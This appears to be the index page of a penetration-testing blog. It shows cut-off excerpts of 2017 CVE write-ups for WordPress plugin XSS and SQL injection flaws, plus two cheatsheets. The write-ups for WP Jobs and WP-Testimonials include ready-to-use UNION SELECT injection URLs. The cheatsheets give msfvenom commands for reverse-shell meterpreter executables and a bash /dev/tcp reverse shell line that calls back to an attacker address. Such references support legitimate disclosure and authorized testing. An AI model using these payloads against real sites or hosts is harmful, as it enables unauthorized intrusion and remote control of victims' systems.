Exploits

CVE-2017-9419: WordPress WP Custom Fields Search v.0.3.28 Reflected Cross-Site Scripting (XSS)

Identification Date: 11/06/2017
Vendor Homepage: http://www.webhammer.co.uk/wordpress#tab-wp-custom-fields-search
Software Link: http://wordpress.org/plugins/wp-custom-fields-search/

Description
This version of the WP Custom Fields Search plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “cs-all-0” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks…

Exploits

CVE-2017-9429: Event List Version v.0.7.8 Blind Based SQL Injection (SQLi)

Identification Date: 04/06/2017
Vendor Homepage: https://profiles.wordpress.org/mibuthu
Software Link: https://wordpress.org/plugins/event-list/

An authenticated user can exploit this vulnerability by editing an event. Each event has an id parameter which is not properly sanitized. An attacker can exploit the vulnerable parameter and execute arbitrary SQL queries using blind based SQL injection.

Proof of Concept
In order to replay the attack, use the…

Exploits

CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)

Identification Date: 11/06/2017
Vendor Homepage: http://www.intensewp.com/
Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/

Description
SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter.

Proof of Concept
In order to replay the attack, use the link below.

http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

The results of the SQL injection are…

Exploits

CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)

Identification Date: 02/06/2017
Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/

Description
SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows an authenticated user to execute arbitrary SQL commands via the testid parameter.

Proof of Concept
Proof of Concept code is provided below.

http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment

The results of the SQL injection are being reflected in…

Cheatsheets

Cheatsheet: Metasploit Payloads

Windows
You can use the following command in order to create an EXE file for a Windows machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe

Linux
In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port]…

Cheatsheets

Cheatsheet: Reverse Shells

Bash
When we don’t have any other third party tool to get a reverse shell back, we can always redirect Bash to our host using the following command.

bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1

Python
When we want to get a reverse shell on Linux, we can do it by abusing the interpreters which come with the Operating…

Exploits

CVE-2017-9420: WordPress Spiffy Calendar v.3.2.0 Reflected Cross-Site Scripting (XSS)

Identification Date: 02/06/2017
Vendor Homepage: http://spiffycalendar.sunnythemes.com/
Software Link: https://wordpress.org/plugins/spiffy-calendar

Description
This version of the Spiffy Calendar plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “yr” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks on the…